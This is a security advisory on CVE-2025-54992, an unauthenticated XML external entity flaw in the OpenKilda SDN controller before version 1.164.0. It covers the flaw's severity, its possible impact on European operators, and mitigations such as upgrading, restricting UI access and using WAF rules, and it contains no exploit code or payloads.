CVE-2025-54992 is a medium-severity vulnerability affecting versions of Telstra's open-source OpenFlow controller OpenKilda prior to 1.164.0. The vulnerability is classified as CWE-611, which corresponds to Improper Restriction of XML External Entity (XXE) Reference. XXE vulnerabilities arise when XML parsers process external entity references without proper validation or restriction, allowing attackers to read arbitrary files or cause denial of service. In this case, the vulnerability allows unauthenticated attackers to exploit the OpenKilda UI instance by injecting malicious XML payloads. When combined with another vulnerability (GHSL-2025-024), this XXE flaw enables attackers to exfiltrate sensitive information from the system running the OpenKilda UI. The vulnerability does not require authentication or user interaction, and the attack vector is network-based (remote). The CVSS 4.0 base score is 6.9, reflecting a medium severity level, with the main impact being confidentiality loss due to information disclosure. The vulnerability has been patched in OpenKilda version 1.164.0. No known exploits are reported in the wild yet. OpenKilda is a software-defined networking (SDN) controller used to manage OpenFlow-enabled network devices, often deployed in large-scale network environments to optimize traffic flow and network programmability. The vulnerability could be leveraged by attackers to gain insight into network configurations, credentials, or other sensitive data, potentially facilitating further attacks or network disruptions.

For European organizations deploying OpenKilda as part of their network infrastructure, this vulnerability poses a risk of unauthorized information disclosure. Since OpenKilda is used to control OpenFlow-enabled network devices, exposure of configuration data or credentials could compromise network integrity and confidentiality. Attackers could leverage this information to map network topologies, identify critical assets, or launch subsequent attacks such as lateral movement or denial of service. The fact that the vulnerability is exploitable without authentication and user interaction increases the risk, especially for organizations exposing the OpenKilda UI to untrusted networks. This could impact telecommunications providers, data centers, cloud service providers, and enterprises relying on SDN for network management. The potential impact includes loss of sensitive operational data, regulatory compliance violations (e.g., GDPR if personal data is exposed), and reputational damage. However, the vulnerability does not directly allow code execution or availability disruption, limiting the immediate operational impact to information disclosure.

European organizations should promptly upgrade OpenKilda installations to version 1.164.0 or later, where the XXE vulnerability is patched. Until upgrades can be applied, organizations should implement network-level controls to restrict access to the OpenKilda UI interface, ensuring it is not exposed to untrusted or public networks. Deploying web application firewalls (WAFs) with rules to detect and block XML external entity payloads can provide temporary protection. Additionally, organizations should audit their OpenKilda configurations to ensure minimal exposure and review logs for suspicious XML parsing errors or unusual access patterns. Employing network segmentation to isolate SDN controllers from general user networks reduces attack surface. Regular vulnerability scanning and penetration testing focused on SDN components can help detect similar issues proactively. Finally, monitoring for updates on GHSL-2025-024 and related vulnerabilities is recommended to maintain comprehensive protection.